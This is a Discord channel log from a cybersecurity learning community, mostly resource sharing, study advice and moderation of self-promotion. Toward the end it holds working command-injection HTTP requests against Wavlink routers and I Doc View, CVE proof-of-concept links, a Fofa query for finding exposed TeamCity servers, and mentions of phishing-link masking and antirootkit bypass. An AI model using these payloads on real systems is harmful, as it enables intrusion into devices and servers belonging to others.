anyone knows a machine wether it's on tryhackme or others?
or maybe setting up a new virtual machine that will have it?
https://github.com/Striving-to-learn/Cybersecurity-Resources been working on a comprehensive cybersecurity resource github repo . I'd like to get your feedback and suggestions.
I think is not working bro
try now. had to temporarily disable it @golden nova
Not bad
Looks pretty good, my only recommendation might be to maybe add a bit more Active Directory stuff, but maybe I just have an obsession with AD
Hello all! I'm looking for good ways to learn cybersecurity and stay up to date on news in the field on my phone. Are there any good android apps that you all would recommend as far as learning, or cyber news? Thank you!
Has anyone got any good links for phone number lookups?
Care to elaborate? What are you trying to do exactly?
this is the app i use for industry news
I'd recommend podcasts as well, such as CyberWire or Smashing Security
A simple script write in rust. Contribute to HI0U/Numverify-Req-Api development by creating an account on GitHub.
I created this Anki deck for my own study purposes. It's a compilation of basic questions and topics that I found useful maybe for interview preparation and general knowledge enhancement.
You can download it from the AnkiWeb page at https://ankiweb.net/shared/info/2114580232?cb=1694109492290 or from my GitHub repository at https://github.com/kevinalexandervanegaszubiria/Basic-Cybersecurity-Interview-Questions-Anki-Deck
For all your blue teamers
https://www.softwaretestinghelp.com/ not sure if its been posted before but there are some nice tutorials here.
Most popular portal for Software professionals! You will absolutely love our tutorials on Software Testing, Development, Software Reviews and much more!
To launch a Reverse shell, the attacker doesnโt need to know the IP address of the victim to access the target computer.
Is it possible to get the actual VM used in any of the rooms .... Say like the owasp top 10 room
When investigating a suspicious process on Linux, try this:
strings /proc/<PID>/environ
For example, a socat command was used to spawn a reverse bindshell backdoor. Environ entry shows SSH connection data and traces to the socat comand. Some versions of netcat do similar.
No, thm won't give out vms
Depends on what room
^ That's true.
There is some that are on Vulnhub,
I have a few of the older ones, like Blue, Retro! ETC.
But if it's THM's own they don't.
@pastel ravine Now you asked about OWASP Top 10, the Juicebox one is avaliable https://owasp.org/www-project-juice-shop/
hey ! every one
i have just recently got my CEH masters and ejpt certs . now to explore more about the field of malware analysis and detection. so i have decided to work on an open source anti malware (also as my final year project ) . I have read few research papers and patents for this , i will be very grateful if you guys can provide me with some resource or provide me some direction or things to consider or someone else project like this . i want to make sure that anti malware should be fairly easy to setup but offers customization for advanced users also most of the detection should be done on the host itself and not by sending a sample to cloud server. thanks in advance
@prisma bison
We create a small Active Directory lab using VirtualBox and a Windows Server Standard evaluation. We'll configure it to act as a Domain Controller and set up ASREPRoast and Kerberoasting attacks step by step.
๐ก Key Highlights:
- ๐๏ธ Setting up the Domain Controller with ease.
- ๐ก๏ธ Exploring the ASREPRoast Attack and making a user vulnerable.
- ๐ Testing the ASREPRoast Attack to obtain password hashes.
- ๐ต๏ธโโ๏ธ Continuing with the Kerberoasting Attack and creating a vulnerable user.
- ๐ Cracking hashes and gaining access.
๐ฅ Watch the full video for practical insights and hands-on experience. https://shorturl.at/quAD0
https://shorturl.at/MQX06
๐ Remember, "Build it before breaking!"
๐ Seeking the OSCP || ECPPTv2 Certification ๐Hey! Buy me a coffee โ and support my quest to conquer these certifications. Your contribution will help me a ...
๐ Seeking the OSCP || ECPPTv2 Certification ๐Hey! Buy me a coffee โ and support my quest to conquer these certifications. Your contribution will help me a ...
Hello guys. Please can someon help with any comprehensive guide on threat modelling?
Throwing my cheat sheets here for others to utilize
Subnetting cheat sheet
Nmap cheat sheet (A bit long so discord scaled it down, apologies)
SOC Architecture map
The original video is from the 2012 Burnett Lecture located here. This is the very end of the 2nd vidoe right before the Q&A
http://learningcenter.unc.edu/ldadhd-services/burnett-seminars/dr-russell-barkley/
The playlist for the entire lecture and Q&A is located here
https://www.youtube.com/watch?v=NUQu-OPrzUc&list=PLzBixSjmbc8drDgzMj4GpPVLt7...
Explore real-world insights from a successful penetration test on an enterprise Active Directory environment. Learn how the domain controllers were compromised within just a few hours using multiple attack vectors. From initial recon to privilege escalation and lateral movement, this case study offers a comprehensive guide to Active Directory se...
Thought this might be a good place to ask - I just graduated from a cybersecurity bootcamp and tryhackme is something I consistently did the whole time. I want to start creating walkthroughs and writeups. Could anyone out there with experience recommend some tools they use to write theirs. Which platform? Medium seems to be popular. How do you insert code into the articles, is there a software you use? Where do you store your images / screenshots. Any input would be greatly appreciated!
Welcome to DFIRScience (https://DFIR.Science). This channel is devoted to research and development in cybersecurity, digital forensics, and incident response. DFIRScience is a mix of practical how-tos on various topics and keeps up on current news and research in digital forensic science, cybercrime investigation, and hacking.
Schedule:
- New t...
imo deciding what the "best tool" to use is procrastination. you will be infinitely better if you start writing & publishing rn then trying to decide what to use ๐
I use Ghost, I do not like Medium. But I like Medium more than not writing at all ๐
Hashnode is good as you own the domain, so you get SEO goodies and a nice domain. Medium is good as the audience is already there
I agree with this so much.
I always end up looking for the "best way" to do something. Life is nowadays all about being as efficient as possible. Using "suboptimal" tools or making less mistakes is not being efficient.
I like this tale a lot
Stephen King, one of the most beloved, famous and bestselling authors
ever, often goes to writerโs conferences. After he talks for a little bit he
says, โAny questions?โInevitably, someone raises their handโIโm paraphrasing hereโand says,
โMr. King, you are one of the most beloved, famous, and bestselling
authors ever. What kind of pencil do you use to write your books?โ Itโs
almost as if knowing what kind of pencil Stephen King uses will help
them be more like Stephen King
Hey, has anyone here used twingate before? If so, do you have any pros or cons or feed back? I'm thinking about using it for my personal network but I want to get the opinion of someone with experience
Wait you're telling me we can turn this sand into intelligence? like smartphones, computers and stuff?
Dive deep into the fascinating journey of how CPUs are made, starting from simple quartz to the complex microprocessors powering our devices. Discover the meticulous process of turning quartz into transistors, the foundation of every microproc...
can anyone explain the php data wrapper for me
Please engage with the community before posting/advertising links.
#pentesting #ctf #hacking #cybersecurity
00:00 - intro
00:33 - Disclaimer
00:43 - Mapping the website
02:15 - Directory listing
04:03 - Hidden portal
05:42 - Bruteforce
06:04 - More enumeration
06:53 - FTP access
07:12 - SSH hacking
08:22 - Another website
09:16 - Interesting file
10:59 - Read arbitrary files
14:11 - More enumeration
14:52 - B...
Very descriptive methodology for web testing
Yeah that was a really good video
hello Folks, do you have any resources to start simple projects with the Rasperry PI?
Here is something to secure or pen-test your Linux endpoints - VPS/VPC/Desktop https://github.com/bgenev/impulse-xdr Provides host & network intrusion detection; tracking indicators of compromise, security posture monitoring, alerting and active response.
CS50 just released this yesterday, its probably very basic but someone out here might enjoy it ๐
It starts oct 2nd
Nice!
Anything CS50 is a + in my books
I took it over the summer and now my uni courses are boring because I already know the stuff
CS50 is in general a very good resources! Tons of free qualitative courses!
hey guys, does anyone know where to find labs on EDR evasion?
Harvard Launches Two New Free Certificate Course
https://www.classcentral.com/report/harvard-cs50-cybersec-sql/#free-certificate
@late comet please interact with the community before self promoting
Is there a zip file or similar I can download to have the same resources such as wordlists etc... that are available on the AttackBox ?
All wordlists are publicly available, they were installed by our AttackBox developer
Youโll just have to search around the internet for them
Please interact with the community before promoting your content ๐
malware related content isn't discussed, much less promoted outside of the advanced channels here
@hushed estuary
Would you like it removed?
@shut ferry Malware is only allowed in #exploit-and-mal-studies
I'm just a member, not a mod or anything, but it'll be removed... as it just was, you can check the rules for how to get access to the advanced channels
My bad, I don't have access there.
I will, thanks.
Gave +1 Rep to @sullen palm
For a reason ๐
Please interact with the community before promoting your content here
I was working on an LFI lab yesterday and just happen to see this post by @rich shore about LFI to RCE without log poisoning. Pretty cool, just checking the vid out now: https://www.youtube.com/watch?v=yq2rq50IMSQ
https://jh.live/fetchtheflag || Play my CTF that I'm co-hosting with Snyk this coming October 27! https://jh.live/fetchtheflag
Free Cybersecurity Education and Ethical Hacking
๐ฅYOUTUBE ALGORITHM โก Like, Comment, & Subscribe!
๐SUPPORT THE CHANNEL โก https://jh.live/patreon
๐ค SPONSOR THE CHANNEL โก https://jh.live/sponsor
๐FOLLOW ME EVERYWHERE โก h...
Please don't ping them
duly noted.
Thanks ๐
My YouTube feed omits anything cyber, definitely adding this to my list!
Gave +1 Rep to @digital lark
Yeah it was a nice synchronicity from the universe to me. I'm going to try it out after lunch to see if it works on the lab i was doing. otherwise i might just do it on my own machine via docker as per the vid
hey guys i really need help with this project, there's a check URL competition in my university for cybersecurity students to help spread awareness of malicious url's, the more you check and report the more points. the resources given to us are : https://www.virustotal.com/ , https://safeweb.norton.com/ , https://www.urlvoid.com/ . how might i have advantage over other's to win ?
a strong persistence tool for Linux
Hello can someone point me in the right direction of building a malware file checker in python
Does anyone know of websites or places I can go to practice bash challenges or bash scripts? I really enjoyed all the rooms on THM.
not sure if something is is like that. but you can build you bash scripts localy
Yeah I have been building some locally but kinda running out of ideas. I have been using Hackerrank as well.
you can automate things you learn
Cmd challenge is a good one
imo this is a good video on exploiting CAP theorem (and eventual vs strong consistency) to steal $$$
Play War Thunder now with my link, and get a massive, free bonus pack including vehicles, boosters and more: https://playwt.link/joeseppi
War Thunder is a highly detailed vehicle combat game containing over 2000 playable tanks, aircrafts and ships spanning over 100 years of development. Immerse yourself completely in dynamic battles with an unp...
Hey, have you checked out exercism.org? They have a Bash track you might be interested in. I find their content quite good for practicing. Used it for C and Python.
Thank you! This is exactly what i was looking for.
Gave +1 Rep to @outer oar
https://inferi.zip/paper/understanding-api-hooking - @inferigang
hello guy! How are you doing? I would like to ask if anyone can suggest tips and resources for the MS SC-200. Apart from books and the MS free material, do you know any good channel to learn by videos? For instance, I used to watch Savill's videos when I took the SC 900, but I noticed that he hasn't released any course for the SC 200. Thanks in advance!
Isn't this like the 4th or 5th time we've had to tell you that self-promotion is frowned upon here?
Facad1ng - The Ultimate URL Masking Tool - An Open-Source URL Masking Tool Designed To Help You Hide Phishing URLs And Make Them Look Legit Using Social Engineering Techniques https://github.com/spyboy-productions/Facad1ng
We have forked mitchmoser's SharpShares to add stealth and evasion features such as sleep/jitter and share spidering. We hope that it will be of help to fellow redteamers: https://github.com/Hackcraft-Labs/SharpShares
Hi! Any useful resources/videos to learn Android app development in Java?
Hey Iโm a bug hunter but most of my sites that I want to attack use APIs and I donโt really know much on those. Anyone got some good tips or rooms for APIs and nginx
The owasp api top ten rooms are good https://tryhackme.com/hacktivities?tab=search&page=1&free=all&order=most-popular&difficulty=all&type=all&searchTxt=api
Thank you
Unlock the World of Ethical Hacking with Industry Experts at Techfest! ๐๐ Join us for a hands-on workshop that will empower you to safeguard the digital realm. Secure your spot today!
Register now at -
techfest.org/hacking
Grab offer & get full access to all the events at Techfest, IIT Bombay.
@karmic shore Hey, please keep it English
And please do not self promote or advertise here ๐
@shut ferry Hey, can you interact with the community a little more before posting your content? ๐
Hey everyone, do you guys have any book or resource suggestions that can help me master active recon - from scanning to finding vulnerabilities?
i gotta give it to u its good script
Hey! Anybody with any necessary materials in preparation for CC ISC2 exam?
I'm not sure this is the server for it, but have you looked at the 1 Million Certified in Cybersecurity by ISC2? You're supposed to register and you'll be given 6-month access to the material.
Yes I have, but the review I read online made me know that the materials given on their portal is not sufficient to pass the exam
I have a few friends who relied solely on the material from ISC2 with no issues.
You might find the solution or material suggestions you are looking for in the Certification Station discord.
ISC2 CC material is all I used to pass the exam, the key is to understand the concepts and how to apply to different scenarios.
@teal snow please interact with the community before self promoting :)
Some black friday deals: https://github.com/0x90n/InfoSec-Black-Friday
Site with hacking challenges
How many have you done?
I only just found it
But had a look at some of them and looked pretty cool
Done a couple so far but will come back to it later
They do.
have fun
FREE AI Resume builder (Pro Lifetime) Only valid for a couple more days.
- Sign-up here: https://www.rezi.ai/
- Click upgrade and select "Lifetime"
- Use code
thanksrezi
Does anyone know a source to a malware free version of immunity debugger?
This is a really good service! I can vouch for that!
Interesting talk about safe/secure coding in C++: https://www.youtube.com/watch?v=I8UvQKvOSSw
https://cppcon.org/
CppCon 2023 Early Access: https://cppcon.org/early-access
Access All 2023 Session Videos Ahead of Their Official Release To YouTube. At least 30 days exclusive access through the Early Access system. Videos will be released to the CppCon channel on a schedule of one video per business day, with initial releases starting in No...
I'm working on a tool https://github.com/NullRobot/Tooth-Fairy . ToothFairy.sh is a versatile tool designed to analyze and summarize data from network capture files and web content. For network captures, the script can extract and search for sensitive information such as email addresses, credit card numbers, passwords, file names, geolocation data, network shares, and more. ToothFairy.sh supports a variety of formats including pcap, pcapng, cap, snoop, netmon, and others.
I'd love any feedback. The web aspect of the script still needs a lot of improvement.
Interesting, I wrote a similar script that extracts RDP's, all ip's, http requests, dos attacks, host names, malware, pings and services. (but I won't be releasing mine)
Oh those are great ideas. @stuck abyss
Thanks ๐คฉ
Gave +1 Rep to @sage heath

well that gave me a jump scare
cool project tho!
Thanks. It needs a lot of work. I'm using it for favorite THM rooms and wherever it falls short I'm updating it.
Gave +1 Rep to @sonic abyss
how basic is it? (because the cybersec chapter one in regular cs50 was very very basic)
pretty basic
still gonna go over it in winter break to see if I'm missing anything with fundamentals
https://securityzines.com/
Interesting concept ๐ค
sorry for the ping but this looks amazing to try especially now that I'm using Wireshark in my pentests
Awesome. It needs a ton of work for the web aspect and going to make that improved. Please let me know what could be better.
I'll use it and try to mess with it and will help in whatever I can
Top AppSec Job Interview Question 12: https://www.youtube.com/watch?v=GOyUxCm1Qjs&ab_channel=HamzaAvvan
https://youtu.be/zA8guDqfv40?si=JGZsYiF6bLQwux1U
100+ AWS course enjoy ๐
The AWS Cloud Project Bootcamp is a free comprehensive training program to equip you with the skills and knowledge to successfully design, build, and implement a cloud project.
https://aws.cloudprojectbootcamp.com
Developed by Andrew Brown.
00:00 Intro
07:10 Welcome to the FREE AWS Cloud Project Bootcamp
10:05 Create a GitHub Account
13:46 Se...
https://github.com/ApprenticeofEnder/KaliDocker
I got fed up with VMs, I got fed up with USBs, and I didn't want to install to bare metal. So I made Kali work for me in Docker.
I mean it's technically possible
hey guys I really want to get good at forensics ctf any tips and resources?
Read read read.
What sort of forensics, all?
Or do you want to specalise, in memory. network, cloud, etc?
Ive been having fun doing the THM forensics rooms
Check the SOC Level 1 path for some forensics rooms
I want to be able to at least know the methodologies or any resources at all so I can at least have an idea to do the forensics sections in CTFs. I want to get good at it basically.
great thank you, you got anymore resources for forensics
Gave +1 Rep to @digital lark
I just started my forensics journey. I have some books on the topic that I bought in a bundle but I haven't read them so I can't give recommendations really
self promo of a discord bot of hacking tools some may find useful https://skerritt.blog/the-ultimate-discord-hacking-bot/
The Ultimate Hacking Botโข๏ธ contains a bunch of useful hacking tools:
- LemmeKnow
- Ares
- Ciphey
- Search-That-Hash
The GitHub Link is below:
GitHub - bee-san/discord-bot: Discord bot for Ares & Lemmeknow in the http://discord.skerritt.blog discord serverDiscord bot for Ares & Lemmeknow in the http://discord.skerritt.blog discord server
Prepare for the AWS Certified Cloud Practitioner Certification (CLF-C02) and pass!
โ๏ธ Developed by Andrew Brown of ExamPro
๐ https://twitter.com/andrewbrown
Get your Free Practice and Downloadable Cheatsheets
๐ https://www.exampro.co/clf-c02
โญ๏ธ Course Contents โญ๏ธ
โ๏ธ 00:00:00 Introduction
โ๏ธ 00:46:02 Cloud Concepts
โ๏ธ 01:19:34 Getting Started
...
Hey folks!
I recently made a substack all about security, both on the developer side, and how you can protect yourself as an individual too. First post is a round up of my favourite low-cost privacy and security enhancement tools. Feel free to share these with family or friends or even use them yourself!
https://robertbabaev.substack.com/p/0x01-a-privacy-and-security-suite
Hey @fallow saffron, can you interact with the community before self promoting, please
My mistake
Could you tell me the person name to contact for promoting any article
This defeats the point of the Discord, it is here for the discussion and celebration of TryHackMe ๐
With a side benefit of sharing knowledge related to information security.
Yeah that's a good blog give it a try
No excessive self-promotion. While you're welcome to post your write-ups, walkthroughs, and streams of TryHackMe content, spamming of your own channels isn't tolerated.
Small self-promo, I've recently finished writing an article I'm pretty proud of: https://medium.com/@aquilosec/a-pentesters-guide-to-graphql-68ac58777bd4. Let me know what you think!
I'm not sure why the image isn't loading ๐
The embed?
Yep, it's fine though
Well written!
Thank you! Appreciate it
It's really nice article
Thank you!
Right, thanks!
@river wave can you just provide the article link please
yeah sure a just a sec
here you go sorry if it was the wrong one
the original article you linked to was about CVSS
You posted a weird link redirect instead of the link to the medium article
Mhm
not sure how to interpret this message X)
Here's a quick bash function I came up with for anyone wanting to easily share a terminal recording (using t-rec, filebin and copyq)
up() {
local file_path=$1
local file_name=$2
local random_bytes=$(openssl rand -hex 16)
curl -s -X 'POST' "https://filebin.net/$random_bytes/$file_name" \
-H 'accept: application/json' \
-H 'Content-Type: application/octet-stream' \
--data-binary @"$file_path" > /dev/null
copyq copy "https://filebin.net/$random_bytes/$file_name"
}
rec() {
local timestamp=$(date +%s)
t-rec -q
up t-rec.gif terminal.gif
mv t-rec.gif "/home/<user>/Pictures/Terminal/$timestamp.gif"
}
Automatically copies it to the clipboard
check out my project. any feedback is greatly appreciated.
it a cli tools that helps you with searching and printing gtfo, lolbas, tldr(man page but like cheatseet for commands), generating reverse shell, and print your notes directly on cli.
https://github.com/foreztgump/gibme
@desert imp please interact with the community before self promoting
i did not know
where to self promote
No excessive self-promotion. While you're welcome to post your write-ups, walkthroughs, and streams of TryHackMe content, spamming of your own channels isn't tolerated.
Want to reshare an important blog post I wrote on making hacking accessible ๐ https://skerritt.blog/making-hacking-accessible/
https://dfirdiva.com/free-affordable-training-news-monthly-dec-2023-jan-2024/
DFIR Diva is one of my go to for resources, here's some free resources for various things DFIR related.
Just completed the Google Dorking room. Found this on Github
https://github.com/m3n0sd0n4ld/uDork/blob/master/dorks/passwords.txt
sorry idk
Don't forget source after to reprocess init files from your home directory
And this is to make a symlink to /opt after you unpack your third party apps in it
https://askubuntu.com/questions/114721/symbolic-link-to-opt
in doing the splunk basics why is it I have to go to youtube to get advice on what to do next, there is so much information missing from the rooms instructions constantly, why? i.e. Select Source -> Where we select the Log source.
Select Source Type -> Select what type of logs are being ingested.
Input Settings ->Select the index where these logs will be dumped and hostName to be associated with the logs.......
The instructions dont tell you that you must create a new index for the VPN logs or that to upload the VPN logs you have to do it in the VM although your told to download the logs onto your PC etc
I wasted 45 mins trying to figure this out just to be able to move forward.
@lavish granite please interact with the community before self promoting
Ok
https://github.com/JaneMandy/CVE-2023-51467-Exploit
Apache Ofbiz CVE-2023-51467 Java
Wavlink่ทฏ็ฑๅจ่ฟ็จๅฝไปคๆง่ก
POST /cgi-bin/mesh.cgi?page=upgrade&key=%27;id%3E%3Echeck.txt' HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
page=night_led&start_hour=;id;
URL /cgi-bin/check.txt
CVE-2023-30547 : VM2 Sandbox < 3.9.17 - Remote Code Execution
POC : https://github.com/rvizx/CVE-2023-30547
Analysis : https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244
CVE-2023-20198 & CVE-2023-20273 :ย Cisco IOS XE Software 'WebUI' - Authenticated / Unauthenticated Command Injection(Root)
POC N/A : https://github.com/smokeintheshell/CVE-2023-20198
POCย N/A : https://github.com/smokeintheshell/CVE-2023-20273
NVD POC : http://packetstormsecurity.com/files/175674/Cisco-IOX-XE-Unauthenticated-Remote-Code-Execution.html
Blog / POCย :
CVE-2023-20198 Exploit PoC. Contribute to smokeintheshell/CVE-2023-20198 development by creating an account on GitHub.
CVE-2023-20273 Exploit PoC. Contribute to smokeintheshell/CVE-2023-20273 development by creating an account on GitHub.
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers
Introduction This post is a follow up to https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/. Previously, we explored the patch for CVE-2023-20273 and CVE-2023-20198 affecting Cisco IOS XE and identified some likely vectors an attacker might [โฆ]
https://mp.weixin.qq.com/s/wHNmO5X9eEI4xH5VkOP-cw
0day | XVE-2023-23743 RCE
๐๐๐๐ง๐๐๐ฅ๐ฅ
Official repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome BugBounty
Artillery
CIA UAC bypass implementation that utilizes elevated COM object to write to System32 and an auto-elevated process to execute as administrator.
StageFright
A staged payload framework that allows the user to run customized staged payloads over various protocols.
https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/StageFright
I Doc Viewๅจ็บฟๆๆกฃ้ข่ง็ณป็ป
POST /system/cmd.json HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 127.0.0.1
Content-Length: 31
Expect: 100-continue
Connection: close
cmd=echo+%26+%28whoami%29+%26
๐ฅCVE-2022-46722 : PWN macOS Kernel Via OTA Update
๐POC : https://github.com/jhftss/POC/blob/main/CVE-2022-46722/exploit.m
โญ๏ธ Video : https://youtu.be/m_gGHVWLQ0Y?si=LgZ7hQVtbe1ZNBgS
Get arbitrary kernel code execution via an SIP-bypass primitive. It works on Intel Macs without the T2 Chip.
๐ฅCVE-2023-42793 : JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE
POC : https://github.com/H454NSec/CVE-2023-42793
Yaml : https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-42793.yaml
Fofa query: title="Log in to TeamCity" icon_hash="-1944119648"
JetBrains TeamCity Authentication Bypass CVE-2023-42793 Exploit - GitHub - H454NSec/CVE-2023-42793: JetBrains TeamCity Authentication Bypass CVE-2023-42793 Exploit
CVE-2023-2640 , CVE-2023-32629 : Ubuntu Linux Kernel - Local Privilege Escalation
POC : https://github.com/luanoliveira350/GameOverlayFS
POC2 : https://github.com/OllaPapito/gameoverlay
Blog : https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability
NIST : https://nvd.nist.gov/vuln/detail/CVE-2023-2640
โ TEST : Tested on Ubuntu 20.04 with kernel 5.4.0
GameoverlayFS (CVE-2023-2640 and CVE-2023-32629) exploit in Shell Script tested on Ubuntu 20.04 Kernel 5.4.0 - GitHub - luanoliveira350/GameOverlayFS: GameoverlayFS (CVE-2023-2640 and CVE-2023-326...
CVE-2023-2640 CVE-2023-32629. Contribute to OllaPapito/gameoverlay development by creating an account on GitHub.
ADCS Exploitation
https://medium.com/@shaunwhorton/certifried-bloodhound-active-directory-certificate-services-abuse-f28850ffefc9
https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-certificate-services/
https://luemmelsec.github.io/Skidaddle-Skideldi-I-just-pwnd-your-PKI/
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin
If you want to set it up yourself:
https://www.virtuallyboring.com/setup-microsoft-active-directory-certificate-services-ad-cs/
https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/
https://www.crowe.com/cybersecurity-watch/exploiting-ad-cs-a-quick-look-at-esc1-esc8
https://youtu.be/NWrVsSRzABw
CVE-2022โ26923, commonly referred to as โCertifriedโ is doing the rounds, and it really is a nasty vuln. I posted a video on LinkedIn lastโฆ
My dear Bagginses and Boffins, Tooks and Brandybucks, Grubbs, Chubbs, Hornblowers, Bolgers, Bracegirdles and Proudfoots - it is time for some new shit.
We are going to explore the wonderful world of Active Directory Certificate Services, aka ADCS.
If you want to leave an impression on your next pentest, this oneโs for you, as Microsoftโs PKI imp...
The new cloud+ certificate 4.0 from compTIA is in beta and you can get it for ยฃ36
Just search "Cloud" when ordering an exam
The current one is around $370 so would say it's a pretty good deal
How long do they stay in beta?
It varies if I remember it correctly, but usually until the beta test results are released (included in the invite or announcement).
I havent got a single cert, not sure if i could do this in time
uh oh
shadow relies on rkhunter and paccheck to make sure they are not in a bad spot
this makes it seem trivial to defeat that security part
hahah
bypass rkhunter is easy
because rkhunter is signature based...
so if you modify exactly functions where located in /var/log/rkhunter.log you can easy bypass rkhunter
hey can anyone provide me a list containing everything useful, while providing me with learning pathway, for various Security jobs? (both red and blue teaming) as a complete beginner with quite a bit of knowledge of python, java, and c++ (i just know the very basics). I'm hoping it's free resources btw.
Walking An Application
Answer the questions below
What is the flag from the HTML comment?
What is the flag from the secret link?
What is the directory listing flag?
What is the framework flag?
Installation Process-
sudo apt update
sudo apt install samba
sudo systemctl status smbd
whereis samba
mkdir strendev/(folder-name)
chmod 777 /home/(username-of-server)/strendev/(folder-name)
sudo smbpasswd -a strendev/(any username you want)
En...
I wrote some code for Asymmetric Key Exchange if anyone is interested in using it or would like to contribute:
Hi, do you know something similar to AWS Attacking and Defending Training that THM just launched?
Similar in what way?
I remember seeing a LI post about AWS earlier -
Sorry for the missing part, i want something similar for learning Azure Security.
or general cloud
For Azure, MS has a lot of free material if I'm not mistaken though you have to be mindful of the use, similar to AWS free tier.
Hey all, just wrote my first-ever blog post on one of my favourite security research findings. I would love to hear your thoughts and I hope that you can take something useful away from it!
https://skii.dev/rook-to-xss/
amazing thanks for sharing! lmao the blind xss part the best ๐
Gave +1 Rep to @sonic abyss (current: #13 - 466)
impact through the roof
Thank you! Yeah, that really caught me off guard ๐
Gave +1 Rep to @heady gust (current: #1311 - 2)
Commands and Links -
Follow This Playlist Before Installing Jellyfin on Docker - https://youtube.com/playlist?list=PLT3u3ipSSqRwS5Jc8EDPm8nCXE-A9LOg8&si=RR3ee-TsCS0TfaNm
Jellyfin - https://jellyfin.org/
https://jellyfin.org/downloads/server
sudo chmod +x /usr/local/bin/docker-compose
----...
really cool stuff! love the narrative elements of the blog, very engaging
Thank you!!
Gave +1 Rep to @versed spire (current: #136 - 48)
Any good resources for RISC-V assembly?
Narratives make things easier to follow imo
For sure
Absolutely fabulous blog. I like how you talked about the steps you did and also explained those steps.
crazy man ๐
ahha lmao, yeah I found this over a year ago now ๐
Might be worth google dorking for that tinymce link and trying the same thing everywhere
Really nice read ! Both technically insightful and well-written
https://learn.microsoft.com/en-us/
https://learn.microsoft.com/en-us/openspecs/protocols/ms-protocolslp/9a3ae8a2-02e5-4d05-874a-b3551405d8f9
Useful ressources to learn more about Microsoft environment and in particular their networking protocols
Curious if anyone knows of any internet facing networks that allow you to ingest their logs for research purposes?
I am working through the SC-200 course and want to ingest logs for analysis in my lab. (Yes I know I could just spin up vms and simulate traffic on them) Id just like to cut cost on compute resources.
Hello, does anyone have good ressources to learn how migration between processes work ? (the migrate command in meterpreter)
New episode my security podcast is out thanks to all who listen every week - https://podcast.lipanisecurity.com/e/apple-zero-day-sold-to-government/
https://belkasoft.com/android-forensics-training
Free 6 CPE Credits - self-paced, Android Security course, sharing for visibility
Note: it apparently only accepts business emails and rejects public email domains. (Acendotal evidence from this reddit post: https://www.reddit.com/r/computerforensics/comments/1awamhm/free_course_android_forensics/) I'd recommend signing up with a business email. Hopefully it will work for you!
Belkasoft has some really good software.
Wow that is great to hear. their training is also not cheap
so the fact this is free is awesome
Yeah, they've gave me a couple of training stuff free
im a student :( + i dont have uni email cuz im not in uni
Aw sorry to hear; maybe try a regular gmail anyway and see if you get it
:hammer: escanor_pride007#0 has been banned.
โญ I'm now offering one-on-one mentoring in development and video production
๐ Limited slots available - sign up here: https://www.patreon.com/coderized
๐ฃ๏ธ Discord is now available, come chat!
๐ https://discord.gg/Y7hEKnxPGf
๐ Support the channel and get some nice perks:
๐ https://www.patreon.com/coderized
Containers are a game-changing...
Please interact with the community first.
This is your final warning @gusty mountain
For my colleagues who want to do pentesting on a Macbook of the M-series, I have created a guide on how to install Parrot OS 6.0 on it. https://github.com/zero2504/blog_pentester
https://medium.com/@pnhbzgrht/tutorial-how-to-install-parrot-os-on-mac-with-arm64-on-parallels-and-vmware-c7d7446cebae
false
check here https://learn.microsoft.com
Try Kasm Workspaces to stream any desktop, app or OS to your web browser:
https://kasmweb.com/community-edition
https://kasmweb.com/cloud-personal
Grab a brand new laptop or desktop running Linux: https://www.tuxedocomputers.com/en#
๐ SUPPORT THE CHANNEL:
Get access to:
- a Daily Linux News show
- a weekly patroncast for more personal thought...
4 years ago we created a community tryhackme recipe site. The site no longer exists, but the recipes do!
Are you interested in what a hackers favourite food is? Take a trip down memory lane ๐
https://github.com/bee-san/TryRecipeMe/tree/master/content/blog
anyone know good resource for manual web pentesting?
Do you know a good certification site for the cloud in general? I already have access to the Cisco platform, and Microsoft Azure but I would like something different ?
Try GCP
https://www.humblebundle.com/software/complete-aws-comptia-azuregoogle-cloud-and-cybersecurity-certification-bundle-software
[ Offer up for 8 more days at time of posting ]
Generally we don't let people just drop links to their own products without participating in the community.
oh cool
Anything for learning assembly?
@stuck abyss link from an inactive user. It's their only message.
@lofty tree No self promotion please, interact more with the community first.
Thanks!
Gave +1 Rep to @ebon sphinx (current: #145 - 47)
you're welcome
ok, got it. Not inactive, though, just not posting much, more on the reading side of things ๐
That's not something we can see though.
based on your join date of thm I just assumed it was like that. Keep on reading 
So, I can not post the link to the GPT I made?
no problem. Just wanted to share a thing I made.
Well, I was trying to interact, didn't I? ๐
Any resources for learning Go for scriptin ?
Just overall scripting or focus on Cybersec stuff?
@ebon tapir Please interact with the community here before self promoting
@fair fable That's book piracy, please DO NOT do this here
Interested in OSINT? Interested in geolocating images taken in Mongolia?
This is a 173 page document on playing Geoguessr in Mongolia!
https://docs.google.com/document/d/1W_QK69BXMHUZXI5VdNH93_aLhTd9SQzNYhRLrh_-ZVA/edit?ref=thebrowser.com
Current Offers on Pentesting Exams: 75% OFF on all our Pentesting Exams. Use CODE: EID-75-OFF
are these secops courses any good? havent heard much about them online
I'm not sure tbh, I'm sort of scepitcal as the with price drop.
I think I'll bite the bait and take the Certified Network Pentester one, looks interesting, will report if anything, if the syllabus are real, it covers way more subjects than eJPT
cool, keep us posted
